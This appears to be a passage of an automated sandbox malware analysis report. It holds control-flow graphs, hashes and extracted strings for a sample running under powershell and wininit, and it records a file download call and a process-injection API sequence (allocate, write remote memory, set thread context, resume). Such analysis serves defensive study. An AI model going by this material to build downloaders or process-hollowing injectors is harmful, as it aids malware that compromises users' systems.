241->247 248 3d1b8f call 264930 241->248 249 3d1b8f call 264548 241->249 244 3d1b94-3d1bf0 246->244 247->244 248->244 249->244
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @#c$b
                                                  • API String ID: 0-816974587
                                                  • Opcode ID: 76327b95f82a82df403f46c03663632836fe498bdbea4c1f816e69b500665394
                                                  • Instruction ID: 17d024f9d5cbfbddd74622083e4ebd9ada60c3a05a1cecbb8f5333c3b5072d36
                                                  • Opcode Fuzzy Hash: 76327b95f82a82df403f46c03663632836fe498bdbea4c1f816e69b500665394
                                                  • Instruction Fuzzy Hash: CA91C236B00205AFCB15DF58E450B6EB7A2BF84710F26816BF815AB351DB72ED41CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 250 264548-26457a 251 2645c0 250->251 252 26457c-264583 250->252 255 2645c3-2645ff 251->255 253 264594 252->253 254 264585-264592 252->254 256 264596-264598 253->256 254->256 264 264605-26460e 255->264 265 264688-264693 255->265 258 26459f-2645a1 256->258 259 26459a-26459d 256->259 261 2645b2 258->261 262 2645a3-2645b0 258->262 263 2645be 259->263 266 2645b4-2645b6 261->266 262->266 263->255 264->265 267 264610-264616 264->267 268 264695-264698 265->268 269 2646a2-2646c4 265->269 266->263 271 26461c-264629 267->271 272 264918-264982 267->272 268->269 276 26478e-264826 269->276 277 2646ca-2646d3 269->277 274 26467f-264686 271->274 275 26462b-26465e 271->275 283 264984-26498a 272->283 284 26498d-264993 272->284 274->265 274->267 289 264660-264663 275->289 290 26467b 275->290 313 264829-264882 276->313 277->272 279 2646d9-264717 277->279 299 264731-264744 279->299 300 264719-26472f 279->300 283->284 287 264995-26499e 284->287 288 2649a1-2649d6 URLDownloadToFileW 284->288 287->288 292 2649df-2649f3 288->292 293 2649d8-2649de 288->293 294 264665-264668 289->294 295 26466f-264678 289->295 290->274 293->292 294->295 301 264746-26474d 299->301 300->301 303 264772 301->303 304 26474f-264760 301->304 303->276 304->303 307 264762-26476b 304->307 307->303 325 264885 call 3d1754 313->325 326 264885 call 3d1770 313->326 318 264887-264890 319 264892-2648a8 318->319 320 2648aa-2648bd 318->320 321 2648bf-2648c6 319->321 320->321 322 2648d5-2648df 321->322 323 2648c8-2648ce 321->323 322->313 323->322 325->318 326->318
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415240405.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_260000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af854ba228094e45fc73acaf1118c92141370dba6d56c509c300989f06d18fa5
                                                  • Instruction ID: d2d73e0aa2efc37a709dd3d4ab8b508f1625568d6fd1f0ac30f88fc190f8c698
                                                  • Opcode Fuzzy Hash: af854ba228094e45fc73acaf1118c92141370dba6d56c509c300989f06d18fa5
                                                  • Instruction Fuzzy Hash: CEE12574A11219AFDB04DF98D880A9EFBF2FF89314F248559E844AB361C771ED91CB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 327 264930-264982 329 264984-26498a 327->329 330 26498d-264993 327->330 329->330 331 264995-26499e 330->331 332 2649a1-2649d6 URLDownloadToFileW 330->332 331->332 333 2649df-2649f3 332->333 334 2649d8-2649de 332->334 334->333
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 002649C9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415240405.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_260000_powershell.jbxd
                                                  Similarity
                                                  • API ID: DownloadFile
                                                  • String ID:
                                                  • API String ID: 1407266417-0
                                                  • Opcode ID: 9e9c259d8e383678469e5df211fdccd37da91643b9ecb452c904141366632b57
                                                  • Instruction ID: 8a24076c59db6e972a4d98fda56d1b056c3994b81c9a6ff03587620499f01f15
                                                  • Opcode Fuzzy Hash: 9e9c259d8e383678469e5df211fdccd37da91643b9ecb452c904141366632b57
                                                  • Instruction Fuzzy Hash: C421F6B1D1161ADFCB00DF9AD884ADEFBB5FF48314F10851AE818A7350D374AA54CBA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 512 3d0998-3d09aa 513 3d0a6a-3d0a9d 512->513 514 3d09b0-3d09c1 512->514 519 3d0a9f-3d0ade 513->519 520 3d0b0b-3d0b15 513->520 517 3d09db-3d09f8 514->517 518 3d09c3-3d09c9 514->518 517->513 530 3d09fa-3d0a1c 517->530 521 3d09cd-3d09d9 518->521 522 3d09cb 518->522 539 3d0b5b-3d0b60 519->539 540 3d0ae0-3d0aee 519->540 523 3d0b17-3d0b1d 520->523 524 3d0b20-3d0b26 520->524 521->517 522->517 526 3d0b2c-3d0b38 524->526 527 3d0b28-3d0b2a 524->527 531 3d0b3a-3d0b58 526->531 527->531 537 3d0a1e-3d0a24 530->537 538 3d0a36-3d0a4e 530->538 542 3d0a28-3d0a34 537->542 543 3d0a26 537->543 547 3d0a5c-3d0a67 538->547 548 3d0a50-3d0a52 538->548 539->540 550 3d0af6-3d0b05 540->550 542->538 543->538 548->547 550->520
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c170206604f1fb404dcefa52999214f21c0abd949cca37f981b9ea223d95cab
                                                  • Instruction ID: eefb3ff91ec9a02b3d545b5c94a77eb5aa3d0ea81d41f4ee5b76776983253ddc
                                                  • Opcode Fuzzy Hash: 2c170206604f1fb404dcefa52999214f21c0abd949cca37f981b9ea223d95cab
                                                  • Instruction Fuzzy Hash: DD514532B043149FE7255B649850B6EBBA2EFC5B10F25C06FE9899F382CA71CD01C7A1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 726 1dd01d-1dd03d 727 1dd08d-1dd095 726->727 728 1dd03f-1dd04a 726->728 727->728 729 1dd04c-1dd05a 728->729 730 1dd082-1dd089 728->730 732 1dd060 729->732 730->729 735 1dd08b 730->735 734 1dd063-1dd06b 732->734 736 1dd06d-1dd075 734->736 737 1dd07b-1dd080 734->737 735->734 736->737 737->736
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415187490.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 553bca000bc8e59867e746ff018fb40b612f60d5efb105958fab1b8e55d76aa7
                                                  • Instruction ID: 43d4006d23e85065d6dd2931a851b1f89a9202e79991655ce64581c28f9a8b0d
                                                  • Opcode Fuzzy Hash: 553bca000bc8e59867e746ff018fb40b612f60d5efb105958fab1b8e55d76aa7
                                                  • Instruction Fuzzy Hash: 1E01DB31104340AAEB209A25E8C4B67BB98EBC1324F28C41AFC480A382D3799D45CAB1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 739 1dd006-1dd03d 740 1dd08d-1dd095 739->740 741 1dd03f-1dd04a 739->741 740->741 742 1dd04c-1dd05a 741->742 743 1dd082-1dd089 741->743 745 1dd060 742->745 743->742 748 1dd08b 743->748 747 1dd063-1dd06b 745->747 749 1dd06d-1dd075 747->749 750 1dd07b-1dd080 747->750 748->747 749->750 750->749
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415187490.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2d0f47874d0e65cce556f3ca4d57e7382869644cf52772dbf4bd179562fb013
                                                  • Instruction ID: 0d98ab126be4fb7f307892ae4affca63d7d4c8492d107c52a87529702cf52f9f
                                                  • Opcode Fuzzy Hash: e2d0f47874d0e65cce556f3ca4d57e7382869644cf52772dbf4bd179562fb013
                                                  • Instruction Fuzzy Hash: E501716150D3C09FD7128B259C94B52BFB4DF53224F1981DBE8888F2A3D2699C48C772
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @#c$@#c$@#c$@#c$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$`86$`86$`86
                                                  • API String ID: 0-1267364048
                                                  • Opcode ID: cddc24846fbd0b71c4465f5cc3468f1b2723edb90371d66a909a198476a26ff0
                                                  • Instruction ID: 9b09c4e8b0d9f904ff040939bd8816de1bfbc61d7c9dbe6ae250c9373a7fb22a
                                                  • Opcode Fuzzy Hash: cddc24846fbd0b71c4465f5cc3468f1b2723edb90371d66a909a198476a26ff0
                                                  • Instruction Fuzzy Hash: 1DD13A36B00209DFDF1A9E64E410BBE77A6AFC1B10F25842BE9159B391CB71DD41CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: <86$@#c$L4#p$L4#p$L4#p$`86$`86
                                                  • API String ID: 0-464623172
                                                  • Opcode ID: 58b47c47cfac17ea60de1fa80bb61aa1fd2341498521422e0eb54a0c9c7327ef
                                                  • Instruction ID: 7ea49961ce090ec31e5021a3850b988853b4af239eccfaa4d3a3b186861cf5c0
                                                  • Opcode Fuzzy Hash: 58b47c47cfac17ea60de1fa80bb61aa1fd2341498521422e0eb54a0c9c7327ef
                                                  • Instruction Fuzzy Hash: E051E776A08388DFDB1B8B10D8147697B71AF82B10F1A81A7E8459B3E3C7749D44CB62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @#c$@#c$@#c$@#c$|:6
                                                  • API String ID: 0-1917465421
                                                  • Opcode ID: 4fc5204ae82992698f1bcc6ed73bb1309c9597b07287e6a02729107b39655775
                                                  • Instruction ID: 770a4b15d483f41f07c6ddb4dfd8469766bec8723e1b6bed6d350c80835e39c3
                                                  • Opcode Fuzzy Hash: 4fc5204ae82992698f1bcc6ed73bb1309c9597b07287e6a02729107b39655775
                                                  • Instruction Fuzzy Hash: B4918732B04244AFDB26AF34E4506AABBF2AFD5310F2580ABD555CB351DB31CD85CB92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @#c$@#c$L4#p$L4#p$L4#p
                                                  • API String ID: 0-1189058554
                                                  • Opcode ID: 1d82218f4bfd553e54debadd041feab8592a867d4d55aff1271278321153567a
                                                  • Instruction ID: 29456d190390cff8db3d7442ba38d7c5e3aedf570122d37153aca1b0af76c1ce
                                                  • Opcode Fuzzy Hash: 1d82218f4bfd553e54debadd041feab8592a867d4d55aff1271278321153567a
                                                  • Instruction Fuzzy Hash: 21614B36B002189FDF1A9E64E4007BE77A6EFC0B10F25802AE9559F391DB71ED51CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0;6$h%3e$h%3e$xFc$xFc
                                                  • API String ID: 0-1289942254
                                                  • Opcode ID: e7977555913dd05b46499a2af8aad97c35ee2f4d90d3acec262dd2a738818e8f
                                                  • Instruction ID: b4a2b86b70d90bb24a555bd638307868cac1faf708592f06ca4d4b12cbf7cca2
                                                  • Opcode Fuzzy Hash: e7977555913dd05b46499a2af8aad97c35ee2f4d90d3acec262dd2a738818e8f
                                                  • Instruction Fuzzy Hash: 7B516637704204AFEB224A69B45067AF7A6AFD2321B39803FE85AC7351DB72CC01C721
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @#c$@#c$L4#p$L4#p$L4#p
                                                  • API String ID: 0-1189058554
                                                  • Opcode ID: 4eaffeeb16078223de2d5950e61b3450c96df793443b415f07b9c96789b89ced
                                                  • Instruction ID: d3ca156ec7ba8fe47a5bf9dbc93e45834d9a8041f3a74dc968ef6d283c39eab5
                                                  • Opcode Fuzzy Hash: 4eaffeeb16078223de2d5950e61b3450c96df793443b415f07b9c96789b89ced
                                                  • Instruction Fuzzy Hash: 59513936B00209EFEF129F64E4007BE77AAAF81310F248167E9159B3A1CB75DD41C7A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @#c$L4#p$L4#p$L4#p
                                                  • API String ID: 0-2233465117
                                                  • Opcode ID: 24cd085a2cc04a7a16f9bc95c6bbf1fddf4e63a56978023dd4d6c1fc6d78906b
                                                  • Instruction ID: a0081d4996832292f1043f92cd2538af24ac5717c9a0c260850a9b65c021de69
                                                  • Opcode Fuzzy Hash: 24cd085a2cc04a7a16f9bc95c6bbf1fddf4e63a56978023dd4d6c1fc6d78906b
                                                  • Instruction Fuzzy Hash: A341E476A002489FDF2A8E14E540BBEB7A5EF80B10F19806BE8555F392D7B0ED94CF51

                                                  Execution Graph

                                                  Execution Coverage:13%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:99
                                                  Total number of Limit Nodes:8
                                                  execution_graph 9043 37e6cd 9046 37f538 9043->9046 9047 37f54d 9046->9047 9050 37f569 9047->9050 9051 37f592 9050->9051 9054 37f8c8 9051->9054 9055 37f8dd 9054->9055 9069 4220112 9055->9069 9077 422048d 9055->9077 9082 422081f 9055->9082 9086 422070f 9055->9086 9091 4220189 9055->9091 9100 422043b 9055->9100 9106 422021a 9055->9106 9114 4220645 9055->9114 9119 42202b4 9055->9119 9123 42204d0 9055->9123 9128 4220280 9055->9128 9135 42201e3 9055->9135 9056 37e651 9070 422011c 9069->9070 9140 37e0f4 9070->9140 9144 37e100 9070->9144 9078 4220496 9077->9078 9148 37dd61 9078->9148 9152 37dd68 9078->9152 9079 4220a0d 9084 37dd61 WriteProcessMemory 9082->9084 9085 37dd68 WriteProcessMemory 9082->9085 9083 422063e 9084->9083 9085->9083 9087 42203f8 9086->9087 9087->9086 9088 4220a6b 9087->9088 9089 37dd61 WriteProcessMemory 9087->9089 9090 37dd68 WriteProcessMemory 9087->9090 9088->9056 9089->9087 9090->9087 9092 422011c 9091->9092 9094 4220105 9092->9094 9096 37e0f4 CreateProcessA 9092->9096 9097 37e100 CreateProcessA 9092->9097 9093 4220201 9093->9056 9094->9056 9095 42201c4 9095->9093 9156 37dec1 9095->9156 9160 37dec8 9095->9160 9096->9095 9097->9095 9101 422046e 9100->9101 9102 4220a5a 9101->9102 9164 37d5e1 9101->9164 9168 37d5e8 9101->9168 9102->9056 9103 4220675 9103->9056 9107 42201aa 9106->9107 9109 42201c4 9106->9109 9107->9109 9110 37e0f4 CreateProcessA 9107->9110 9111 37e100 CreateProcessA 9107->9111 9108 4220201 9108->9056 9109->9108 9112 37dec1 ReadProcessMemory 9109->9112 9113 37dec8 ReadProcessMemory 9109->9113 9110->9109 9111->9109 9112->9109 9113->9109 9115 4220660 9114->9115 9117 37d5e1 ResumeThread 9115->9117 9118 37d5e8 ResumeThread 9115->9118 9116 4220675 9116->9056 9117->9116 9118->9116 9172 37db10 9119->9172 9176 37db08 9119->9176 9120 42202ce 9120->9056 9124 42201ef 9123->9124 9124->9123 9125 4220201 9124->9125 9126 37dec1 ReadProcessMemory 9124->9126 9127 37dec8 ReadProcessMemory 9124->9127 9125->9056 9126->9124 9127->9124 9180 37dc40 9128->9180 9184 37dc39 9128->9184 9129 422029e 9130 42208ec 9129->9130 9133 37dd61 WriteProcessMemory 9129->9133 9134 37dd68 WriteProcessMemory 9129->9134 9130->9056 9133->9129 9134->9129 9136 42201ef 9135->9136 9137 4220201 9136->9137 9138 37dec1 ReadProcessMemory 9136->9138 9139 37dec8 ReadProcessMemory 9136->9139 9137->9056 9138->9136 9139->9136 9141 37e187 CreateProcessA 9140->9141 9143 37e3e5 9141->9143 9145 37e187 CreateProcessA 9144->9145 9147 37e3e5 9145->9147 9149 37ddb4 WriteProcessMemory 9148->9149 9151 37de53 9149->9151 9151->9079 9153 37ddb4 WriteProcessMemory 9152->9153 9155 37de53 9153->9155 9155->9079 9157 37df14 ReadProcessMemory 9156->9157 9159 37df92 9157->9159 9159->9095 9161 37df14 ReadProcessMemory 9160->9161 9163 37df92 9161->9163 9163->9095 9165 37d62c ResumeThread 9164->9165 9167 37d67e 9165->9167 9167->9103 9169 37d62c ResumeThread 9168->9169 9171 37d67e 9169->9171 9171->9103 9173 37db59 Wow64SetThreadContext 9172->9173 9175 37dbd7 9173->9175 9175->9120 9177 37db10 Wow64SetThreadContext 9176->9177 9179 37dbd7 9177->9179 9179->9120 9181 37dc84 VirtualAllocEx 9180->9181 9183 37dd02 9181->9183 9183->9129 9185 37dc84 VirtualAllocEx 9184->9185 9187 37dd02 9185->9187 9187->9129

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $ $&$&$7$9$=$C$E$E$H{o$_$j$x
                                                  • API String ID: 0-3582549290
                                                  • Opcode ID: 837a4ef56ac073468d70a6a6a65799f258686ec903617eb27315f881e6f1cbd4
                                                  • Instruction ID: 69b7e0d5a56facb415d9b8f0fb362f0f852da399d467d9440e48d345cd654b12
                                                  • Opcode Fuzzy Hash: 837a4ef56ac073468d70a6a6a65799f258686ec903617eb27315f881e6f1cbd4
                                                  • Instruction Fuzzy Hash: 1C826E30A10705CFC769EF74C894B9EB7B2BF89300F5186A9E059AB361DB74A985CF41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 224 37108f-371092 225 371094 224->225 226 371071-371088 224->226 227 371096-3710c7 225->227 228 3710f4-371205 call 3706f8 * 2 call 370708 * 2 call 370718 call 370728 call 370738 225->228 226->224 227->228 264 37120b-37123a call 370748 228->264 266 37123f-3713f9 call 370758 call 370768 call 370778 call 370788 call 370748 call 370758 call 370768 call 370778 call 370788 264->266 289 3713fe 266->289 290 371408-371489 call 370798 call 3707a8 289->290 300 3715d5-3715f7 290->300 301 37148f-3714a2 290->301 312 371605-371621 300->312 313 3715f9-3715ff 300->313 302 3714a4-3714aa 301->302 303 3714ab-3714d4 301->303 302->303 305 371d84-371db7 303->305 306 3714da-3714f7 303->306 320 371dba-371dbc 305->320 306->305 307 3714fd-371512 306->307 307->305 310 371518-371541 call 3707b8 307->310 310->305 319 371547-371570 310->319 325 371628-37163f 312->325 316 371603 313->316 317 371601 313->317 316->312 317->312 321 371575-371581 319->321 322 371572 319->322 323 371dcf-371df4 320->323 324 371dbe-371dc8 320->324 321->305 326 371587-37159d 321->326 322->321 330 371df6-371e0b call 370fc4 323->330 324->320 327 371dca-371dce 324->327 331 371645-371647 325->331 326->305 329 3715a3-3715b6 326->329 329->305 332 3715bc-3715cf 329->332 336 371e0d-371e11 330->336 334 371651-371655 331->334 332->300 332->301 337 37165b-37165f 334->337 337->305 338 371665-371673 337->338 338->305 340 371679-371702 338->340 350 37170c-371715 340->350 351 37171e-371d83 call 370748 call 370758 call 370768 call 370778 call 370788 call 370748 call 370758 call 370768 call 370778 call 370788 call 3707c8 call 370748 call 370758 call 370768 call 370778 call 370788 call 3707d8 call 3707e8 call 3707f8 call 370748 call 370768 call 370778 call 370808 call 370818 call 370828 call 370ccc call 370cdc call 370cec * 6 call 370cfc call 370d0c call 370768 call 3706b0 call 370d1c call 370d2c 350->351
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $ $&$&$7$9$=$C$E$E$H{o$_$j$x
                                                  • API String ID: 0-3582549290
                                                  • Opcode ID: eb84ca880f64c20294296c676d2620904734d36c62226382dd02d807859e7c78
                                                  • Instruction ID: 7edfe8465d06cf99599e76ec937ee63e8175793661f6e9a704590b7b2636c76e
                                                  • Opcode Fuzzy Hash: eb84ca880f64c20294296c676d2620904734d36c62226382dd02d807859e7c78
                                                  • Instruction Fuzzy Hash: 2E825C30A10705CFC769EF74C894B9EB7B2BF89300F1186A9E0596B361DB75A985CF41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 454 3710d2-371205 call 3706f8 * 2 call 370708 * 2 call 370718 call 370728 call 370738 487 37120b-37123a call 370748 454->487 489 37123f-3713f9 call 370758 call 370768 call 370778 call 370788 call 370748 call 370758 call 370768 call 370778 call 370788 487->489 512 3713fe 489->512 513 371408-371489 call 370798 call 3707a8 512->513 523 3715d5-3715f7 513->523 524 37148f-3714a2 513->524 535 371605-371621 523->535 536 3715f9-3715ff 523->536 525 3714a4-3714aa 524->525 526 3714ab-3714d4 524->526 525->526 528 371d84-371db7 526->528 529 3714da-3714f7 526->529 543 371dba-371dbc 528->543 529->528 530 3714fd-371512 529->530 530->528 533 371518-371541 call 3707b8 530->533 533->528 542 371547-371570 533->542 548 371628-37163f 535->548 539 371603 536->539 540 371601 536->540 539->535 540->535 544 371575-371581 542->544 545 371572 542->545 546 371dcf-371df4 543->546 547 371dbe-371dc8 543->547 544->528 549 371587-37159d 544->549 545->544 553 371df6-371e0b call 370fc4 546->553 547->543 550 371dca-371dce 547->550 554 371645-371647 548->554 549->528 552 3715a3-3715b6 549->552 552->528 555 3715bc-3715cf 552->555 559 371e0d-371e11 553->559 557 371651-371655 554->557 555->523 555->524 560 37165b-37165f 557->560 560->528 561 371665-371673 560->561 561->528 563 371679-371702 561->563 573 37170c-371715 563->573 574 37171e-371d83 call 370748 call 370758 call 370768 call 370778 call 370788 call 370748 call 370758 call 370768 call 370778 call 370788 call 3707c8 call 370748 call 370758 call 370768 call 370778 call 370788 call 3707d8 call 3707e8 call 3707f8 call 370748 call 370768 call 370778 call 370808 call 370818 call 370828 call 370ccc call 370cdc call 370cec * 6 call 370cfc call 370d0c call 370768 call 3706b0 call 370d1c call 370d2c 573->574
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $ $&$&$7$9$=$C$E$E$H{o$_$j$x
                                                  • API String ID: 0-3582549290
                                                  • Opcode ID: 352ac3dd3d39a3287f5d8c33aade70b4ed83493c101ef08fee892f9505a82cc9
                                                  • Instruction ID: d4fab2e47fa0eb073c25cc376683860161c8e2c20ff4ca5dd405b516c7fd7257
                                                  • Opcode Fuzzy Hash: 352ac3dd3d39a3287f5d8c33aade70b4ed83493c101ef08fee892f9505a82cc9
                                                  • Instruction Fuzzy Hash: 15825D30A10705CFC769EF74C894B9EB7B2BF89300F5186A9E049AB361DB75A985CF41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 677 372808-372830 678 372837-3728f3 677->678 679 372832 677->679 682 3728f5-37291b 678->682 683 3728f8-372905 678->683 679->678 685 372921-37294b 682->685 686 372e0b-372e4d 682->686 683->682 689 372951-372969 685->689 690 373018-373024 685->690 695 372e50-372e54 686->695 692 37296f-372970 689->692 693 37302a-373033 689->693 690->693 694 372ffe-37300a 692->694 700 373039-373045 693->700 696 372975-372981 694->696 697 373010-373017 694->697 698 372a26-372a2a 695->698 699 372e5a-372e60 695->699 703 372983 696->703 704 372988-3729a3 696->704 701 372a3c-372a42 698->701 702 372a2c-372a3a 698->702 699->686 705 372e62-372ebd 699->705 709 37304b-373057 700->709 707 372a87-372a8b 701->707 706 372a9a-372acc 702->706 703->704 704->700 708 3729a9-3729ce 704->708 727 372ef4-372f1e 705->727 728 372ebf-372ef2 705->728 729 372af6 706->729 730 372ace-372ada 706->730 710 372a44-372a50 707->710 711 372a8d 707->711 708->709 721 3729d4-3729d6 708->721 717 37305d-373064 709->717 713 372a57-372a5f 710->713 714 372a52 710->714 716 372a90-372a94 711->716 719 372a84 713->719 720 372a61-372a75 713->720 714->713 716->706 722 372a0c-372a23 716->722 719->707 725 372a7b-372a82 720->725 726 3729d9-3729e4 720->726 721->726 722->698 725->711 726->717 731 3729ea-372a07 726->731 738 372f27-372fa6 727->738 728->738 737 372afc-372b29 729->737 734 372ae4-372aea 730->734 735 372adc-372ae2 730->735 731->716 739 372af4 734->739 735->739 744 372b2b-372b63 737->744 745 372b78-372c0b 737->745 753 372fad-372fc0 738->753 739->737 752 372fcf-372fd4 744->752 760 372c14-372c15 745->760 761 372c0d 745->761 755 372fd6-372fe4 752->755 756 372feb-372ffb 752->756 753->752 755->756 756->694 762 372c66-372c6c 760->762 761->760 763 372c17-372c36 762->763 764 372c6e-372d30 762->764 765 372c3d-372c63 763->765 766 372c38 763->766 775 372d32-372d6b 764->775 776 372d71-372d75 764->776 765->762 766->765 775->776 777 372d77-372db0 776->777 778 372db6-372dba 776->778 777->778 780 372dbc-372df5 778->780 781 372dfb-372dff 778->781 780->781 781->705 782 372e01-372e09 781->782 782->695
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :$p!p$~
                                                  • API String ID: 0-320839381
                                                  • Opcode ID: 5cf9805a62f50dd6d7e2d3383d64a0fa8acda9978770987c87e0739dfa685f07
                                                  • Instruction ID: 5179b1c02a9ad30f767d5080d4e6cfc548b1233e2f8f9e4c8ce89a461eeeca20
                                                  • Opcode Fuzzy Hash: 5cf9805a62f50dd6d7e2d3383d64a0fa8acda9978770987c87e0739dfa685f07
                                                  • Instruction Fuzzy Hash: 4142D475A00228DFDB65CFA9C980B99BBB2FF49300F1580E9E509AB261DB35DD91DF10

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
